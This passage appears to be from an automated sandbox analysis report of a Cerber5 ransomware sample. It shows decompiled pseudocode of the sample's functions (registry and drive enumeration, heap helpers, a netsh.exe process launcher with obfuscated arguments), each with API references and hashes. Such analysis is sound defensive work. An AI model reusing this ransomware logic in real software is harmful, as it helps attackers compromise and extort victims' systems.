                                                                                                                                                                                        						if(_t27 == 0 && _v8 != 0) {
                                                                                                                                                                                        							_t30 = _t30 | _v8;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						RegCloseKey(_v12); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t31 = _t31 + 1;
                                                                                                                                                                                        				} while (_t31 < 2);
                                                                                                                                                                                        				return  !_t30 & _v20;
                                                                                                                                                                                        			}



















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 0040A0AD
                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2666887985-0
                                                                                                                                                                                        • Opcode ID: 98d578a29b34be7c7f14f1d4082e872bc01e994f5f5c88348c940d1bfaa40c78
                                                                                                                                                                                        • Instruction ID: 31f235d855805f4f5877ecc24470a71aed6712d684aed6bf08466ec839675859
                                                                                                                                                                                        • Opcode Fuzzy Hash: 98d578a29b34be7c7f14f1d4082e872bc01e994f5f5c88348c940d1bfaa40c78
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E119EB2E40218BFEB10AFE19C85EAFBBBDEB44344F104076E914F2181D7745A198B99
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                        			E004053CA(void* __eax, void* __ecx, void* __edi) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t27 = __edi;
                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_t29 = __eax;
                                                                                                                                                                                        				_v8 = GetLastError();
                                                                                                                                                                                        				if(E0040521D() == 0) {
                                                                                                                                                                                        					E004052DB(_t22);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t20 = 0;
                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                        					L12:
                                                                                                                                                                                        					SetLastError(_v8);
                                                                                                                                                                                        					return _t20;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t32 = E004051F5(_t22, _t29 + 2);
                                                                                                                                                                                        					_t35 = _t27;
                                                                                                                                                                                        					if(_t27 == 0) {
                                                                                                                                                                                        						L9:
                                                                                                                                                                                        						_t4 = _t32 + 0xc; // 0xc
                                                                                                                                                                                        						_t12 = RtlAllocateHeap( *0x42f808, 8, _t4); // executed
                                                                                                                                                                                        						L10:
                                                                                                                                                                                        						__eflags = _t12;
                                                                                                                                                                                        						if(_t12 != 0) {
                                                                                                                                                                                        							_t20 = E00405329(_t12, _t32);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_push(_t27);
                                                                                                                                                                                        					if(E0040522F(0, _t32, _t35) == 0) {
                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_t32 > E004053C6(_t27)) {
                                                                                                                                                                                        						_t17 = _t27 - 8;
                                                                                                                                                                                        						__eflags = _t17;
                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t3 = _t32 + 0xc; // 0xc
                                                                                                                                                                                        						_t12 = RtlReAllocateHeap( *0x42f808, 8, _t17, _t3);
                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t20 = _t27;
                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
                                                                                                                                                                                          • Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D
                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457
                                                                                                                                                                                          • Part of subcall function 004052DB: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
                                                                                                                                                                                          • Part of subcall function 004052DB: HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
                                                                                                                                                                                          • Part of subcall function 004052DB: GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C
                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(00000008,?,0000000C), ref: 0040542D
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,0000000C), ref: 00405441
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$AllocateCurrentErrorLastProcess$CreateInformation
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2700697227-0
                                                                                                                                                                                        • Opcode ID: 5e42c8e7b403c25a8e0d9805a945b71aec9dd386c3cc86fb145e832e39bc8926
                                                                                                                                                                                        • Instruction ID: 60861b4cb21ab03a9d491da3f7eb1cca335a308e405506aebc7ad154f13da930
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e42c8e7b403c25a8e0d9805a945b71aec9dd386c3cc86fb145e832e39bc8926
                                                                                                                                                                                        • Instruction Fuzzy Hash: A101A131600E019BDB217BA5AC85BAB73A8DB00745744007FE801BA2D2EBB99C895E5C
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                        			E0040533B(void* __ecx, void* __edi, long _a4) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t27 = __edi;
                                                                                                                                                                                        				_t24 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_v8 = GetLastError();
                                                                                                                                                                                        				if(E0040521D() == 0) {
                                                                                                                                                                                        					E004052DB(_t24); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                                                        					_t2 = _t27 + 2; // 0x16
                                                                                                                                                                                        					_t29 = E004051F5(_t24, _t2);
                                                                                                                                                                                        					_t3 = _t29 + 0xc; // 0xc
                                                                                                                                                                                        					_t16 = RtlAllocateHeap( *0x42f808, _a4, _t3); // executed
                                                                                                                                                                                        					if(_t16 != 0) {
                                                                                                                                                                                        						_t22 = E00405329(_t16, _t29);
                                                                                                                                                                                        						if((_a4 & 0x00000008) == 0) {
                                                                                                                                                                                        							memset(_t22 + _t27, 0, _t29 - _t27);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t22 != 0) {
                                                                                                                                                                                        							SetLastError(_v8);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t22;
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10), ref: 0040533F
                                                                                                                                                                                          • Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,0000000C,?), ref: 00405377
                                                                                                                                                                                        • memset.NTDLL ref: 00405399
                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 004053A8
                                                                                                                                                                                          • Part of subcall function 004052DB: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
                                                                                                                                                                                          • Part of subcall function 004052DB: HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
                                                                                                                                                                                          • Part of subcall function 004052DB: GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$CurrentErrorLastProcess$AllocateCreateInformationmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3762545016-0
                                                                                                                                                                                        • Opcode ID: f8a36282de33a118b0e3e3b4a1a5650a6279c3d7d066af10e21ffce48dc56cd7
                                                                                                                                                                                        • Instruction ID: ce92fe84d581c274f0df690b864ad1bc2663d76769bd6b62b0cd724ef4544cd3
                                                                                                                                                                                        • Opcode Fuzzy Hash: f8a36282de33a118b0e3e3b4a1a5650a6279c3d7d066af10e21ffce48dc56cd7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7601A732500605ABCB206BA5DD45B9B7BACDF44388F00407EFC01F2191EBB9D9089E5C
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                        			E0040186A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t41 = __eflags;
                                                                                                                                                                                        				_t31 = __edi;
                                                                                                                                                                                        				_t30 = __edx;
                                                                                                                                                                                        				_t25 = __ecx;
                                                                                                                                                                                        				_t24 = __ebx;
                                                                                                                                                                                        				E00405F6B(__ecx, __eflags,  &_v8);
                                                                                                                                                                                        				 *((intOrPtr*)(_t32 - 0x114)) = 0x104;
                                                                                                                                                                                        				GetSystemDirectoryA( &_v276, ??);
                                                                                                                                                                                        				_push( &_v276);
                                                                                                                                                                                        				wsprintfA("C:\\Windows\\system32\\netsh.exe", E00405905(0x40cff8, 0xc, 0x2aa4a3d7));
                                                                                                                                                                                        				E0040137F(__ebx, _t25, __edi, _t41, E00405905(0x40d008, 0x18, 0xb4a6dea5)); // executed
                                                                                                                                                                                        				_pop(_t26);
                                                                                                                                                                                        				E0040137F(__ebx, _t26, __edi, _t41, E00405905(0x40d024, 5, 0xfc5a18c0)); // executed
                                                                                                                                                                                        				_pop(_t27);
                                                                                                                                                                                        				E004017EC(__ebx, _t27, _t30, __edi, _t41, _a4, E0040591C(0x40d02c, 0xf, 0xb361f514)); // executed
                                                                                                                                                                                        				E004017EC(__ebx, _t27, _t30, __edi, _t41, _a4, E0040591C(0x40d03c, 0x12, 0xa8d890bb)); // executed
                                                                                                                                                                                        				_t23 = E004017EC(_t24, _t27, _t30, _t31, _t41, _a4, E0040591C(0x40d050, 0x10, 0x81c6a2e2)); // executed
                                                                                                                                                                                        				return _t23;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8
                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,?), ref: 0040188A
                                                                                                                                                                                        • wsprintfA.USER32 ref: 004018B1
                                                                                                                                                                                          • Part of subcall function 0040137F: memset.NTDLL ref: 004013B8
                                                                                                                                                                                          • Part of subcall function 0040137F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
                                                                                                                                                                                          • Part of subcall function 0040137F: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
                                                                                                                                                                                          • Part of subcall function 0040137F: TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
                                                                                                                                                                                          • Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
                                                                                                                                                                                          • Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • C:\Windows\system32\netsh.exe, xrefs: 004018AC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Handle$CloseProcess$AddressCreateDirectoryModuleObjectProcSingleSystemTerminateWaitmemsetwsprintf
                                                                                                                                                                                        • String ID: C:\Windows\system32\netsh.exe
                                                                                                                                                                                        • API String ID: 307263144-1698292435
                                                                                                                                                                                        • Opcode ID: 15e6b6e0acbb50e8ab7960b3f29334ac1dc589ca9ea0ba573fad60bcdb7bf4e1
                                                                                                                                                                                        • Instruction ID: 255fbad84316beb51453b9837b04682ca2b29f5d2e99bd22823ad66c03b268c6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 15e6b6e0acbb50e8ab7960b3f29334ac1dc589ca9ea0ba573fad60bcdb7bf4e1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F11A9F1D40608BBE61037A19C47FAF3B5CDB1474CF11043AB908B50D3E9BD5A6959AE
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • shutdown.WS2_32(av@,00000002), ref: 0040556E
                                                                                                                                                                                        • closesocket.WS2_32(?), ref: 00405578
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: closesocketshutdown
                                                                                                                                                                                        • String ID: av@
                                                                                                                                                                                        • API String ID: 572888783-3119376357
                                                                                                                                                                                        • Opcode ID: cc947e4da2cd926d8f72edfa744815291745d11b9b859c304ff0b658672672c5
                                                                                                                                                                                        • Instruction ID: ae5811c37d22f4f0b61787900125bfdb5bb523f9631432ff431403366cf658b5
                                                                                                                                                                                        • Opcode Fuzzy Hash: cc947e4da2cd926d8f72edfa744815291745d11b9b859c304ff0b658672672c5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 93B00271544211ABDF215F52DF0EA197E61BBC4741F448CA8B29968071C7B24861FB16
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E00401647(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                        				intOrPtr* _t58;
                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t81 = __edi;
                                                                                                                                                                                        				_t80 = __edx;
                                                                                                                                                                                        				_t1 = _t81 + 8; // 0x26a16d68
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_push( &_v16);
                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                        				_push(0x30);
                                                                                                                                                                                        				_push(_a8);
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t44 = E0040591C(0x40cf44, 3, 0x95ba59f4);
                                                                                                                                                                                        				_t87 = _t86 + 0xc;
                                                                                                                                                                                        				_push(_t44);
                                                                                                                                                                                        				_t6 = _t81 + 8; // 0x26a16d68, executed
                                                                                                                                                                                        				_push( *_t6);
                                                                                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t1)) + 0x50))() >= 0) {
                                                                                                                                                                                        					while(_v16 != 0) {
                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                        						 *((intOrPtr*)( *_v16 + 0x10))(_v16, 0xffffffff, 1,  &_v12,  &_v20);
                                                                                                                                                                                        						if(_v20 != 0) {
                                                                                                                                                                                        							_t83 =  *_v12;
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push( &_v36);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_t52 = E0040591C(0x40cf48, 0x16, 0xdbed4375);
                                                                                                                                                                                        							_t88 = _t87 + 0xc;
                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                        							_push(_v12);
                                                                                                                                                                                        							if( *((intOrPtr*)( *_v12 + 0x10))() >= 0 && _v36 == 8) {
                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                        								E00402B9B(0, _t80, _t81, _t83);
                                                                                                                                                                                        								_t88 = _t88 + 0x18;
                                                                                                                                                                                        								E004015BB(_v28, _t80, _t81, _t85);
                                                                                                                                                                                        								 *0x40e9f0( &_v36, _a4, _a4, E0040591C(0x40cf60, 0x1a, 0x35cc9c24), _v28);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t84 =  *_v12;
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push( &_v36);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_t56 = E0040591C(0x40cf7c, 0x18, 0x53ac65f8);
                                                                                                                                                                                        							_t87 = _t88 + 0xc;
                                                                                                                                                                                        							_push(_t56);
                                                                                                                                                                                        							_push(_v12);
                                                                                                                                                                                        							if( *((intOrPtr*)( *_v12 + 0x10))() >= 0 && _v36 == 8) {
                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                        								E00402B9B(0, _t80, _t81, _t84);
                                                                                                                                                                                        								_t87 = _t87 + 0x18;
                                                                                                                                                                                        								E004015BB(_v28, _t80, _t81, _t85);
                                                                                                                                                                                        								 *0x40e9f0( &_v36, _a4, _a4, E0040591C(0x40cf98, 0x1c, 0x76d74b7b), _v28);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t58 = _v12;
                                                                                                                                                                                        							 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                        							 *0x40e9f0( &_v36);
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L11:
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}






















                                                                                                                                                                                        0x004017b1

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VariantClear.OLEAUT32(00000008), ref: 0040171A
                                                                                                                                                                                        • VariantClear.OLEAUT32(00000008), ref: 00401789
                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040179C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                                                        • Opcode ID: 522b1c1819fb73ec40a814644e312d63c6a7a3492c1e3534ecb8c3d05c9c2061
                                                                                                                                                                                        • Instruction ID: 9f5217d57780e906635a0639c0cfcdcfb784e3fe1d0021f386375b494062b63c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 522b1c1819fb73ec40a814644e312d63c6a7a3492c1e3534ecb8c3d05c9c2061
                                                                                                                                                                                        • Instruction Fuzzy Hash: B0415DB1940219BFDF00AF94CC85EAEBB78FF04308F00456AF911B72D1D7799A598B65
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 49%
                                                                                                                                                                                        			E004060A3(void* __ecx, char* _a4, void* _a8) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                        				int _t11;
                                                                                                                                                                                        				int _t17;
                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_t20 = 0;
                                                                                                                                                                                        				_t8 = GetFileVersionInfoSizeA(_a4, 0); // executed
                                                                                                                                                                                        				_t24 = _t8;
                                                                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                                                                        					_t27 = E004053BD(_t22);
                                                                                                                                                                                        					if(_t27 != 0) {
                                                                                                                                                                                        						_t11 = GetFileVersionInfoA(_a4, 0, _t24, _t27); // executed
                                                                                                                                                                                        						if(_t11 != 0) {
                                                                                                                                                                                        							_push( &_v8);
                                                                                                                                                                                        							_push( &_v12);
                                                                                                                                                                                        							_push(E00405905(0x40d3a0, 1, 0xfadad64a));
                                                                                                                                                                                        							_push(_t27);
                                                                                                                                                                                        							if( *0x40e168() != 0) {
                                                                                                                                                                                        								_t17 = _v8;
                                                                                                                                                                                        								if(_t17 > 0x34) {
                                                                                                                                                                                        									_t17 = 0x34;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								memcpy(_a8, _v12, _t17);
                                                                                                                                                                                        								_t20 = 1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00405463(_t27);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t20;
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetFileVersionInfoSizeA.KERNELBASE(00406186,00000000,00430728,?,?,?,?,00406186,00000000,?,?,00000064), ref: 004060B0
                                                                                                                                                                                        • GetFileVersionInfoA.KERNELBASE(00406186,00000000,00000000,00000000,00000001,?,?,?,?,00406186,00000000,?,?,00000064), ref: 004060CE
                                                                                                                                                                                        • memcpy.NTDLL(?,00406186,00000000,?,00406186,00000000,?,?,00000064), ref: 00406112
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileInfoVersion$Sizememcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4130575638-0
                                                                                                                                                                                        • Opcode ID: 7c0d1d1338af05a15d2546e88fa887c843bb31a21d7c274e246a8b7fb8ad1e02
                                                                                                                                                                                        • Instruction ID: 449c8aad864a650708bbe3ccfa1baa80ae95fa732491fbb87c8b7e442310dca9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c0d1d1338af05a15d2546e88fa887c843bb31a21d7c274e246a8b7fb8ad1e02
                                                                                                                                                                                        • Instruction Fuzzy Hash: C701FC72600008BFEB106BA1DC86DEF3B5DDB41394B050437F901FA191D77A8E508AA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040A150(WCHAR* _a4) {
                                                                                                                                                                                        				short _v1044;
                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t5 = GetDriveTypeW(_a4); // executed
                                                                                                                                                                                        				_t12 = _t5;
                                                                                                                                                                                        				if(_t12 >= 2 && (_t12 <= 3 || _t12 == 6) && QueryDosDeviceW(_a4,  &_v1044, 0x208) != 0 && StrCmpNW( &_v1044, E0040591C( &E0040D8A8, 4, 0xf6d853a4), 4) == 0) {
                                                                                                                                                                                        					_t12 = 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t12;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(00000000,00000000), ref: 0040A15D
                                                                                                                                                                                        • QueryDosDeviceW.KERNEL32(00000000,?,00000208), ref: 0040A183
